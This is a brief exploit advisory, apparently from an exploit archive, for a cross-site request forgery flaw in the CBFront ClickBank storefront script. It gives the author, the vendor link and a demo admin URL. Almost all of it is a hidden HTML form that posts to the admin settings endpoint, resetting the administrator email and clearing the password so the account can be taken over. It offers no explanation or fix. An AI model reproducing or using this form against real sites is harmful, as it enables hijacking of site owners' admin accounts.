# Exploit Title: CBFront CSRF # Author: Jonturk75 # Vendor or Software Link: http://www.scripts.com/viewscript/cbfront-the-professional-clickbank-storefront/23964/ # Category:: webapps # Demo : http://www.cbfront.com/demonstration/admin/login <form id="editForm" action="http://www.cbfront.com/demonstration/admin/settings/saveadmin" method="post"> <input type="hidden" value="mail@mail.com" size="35" name="email"/> <input type="hidden" value="" size="35" name="password"/> <input type="hidden" value="" size="35" name="password"/> <button type="button" id="save" name="save">Save</button> </form>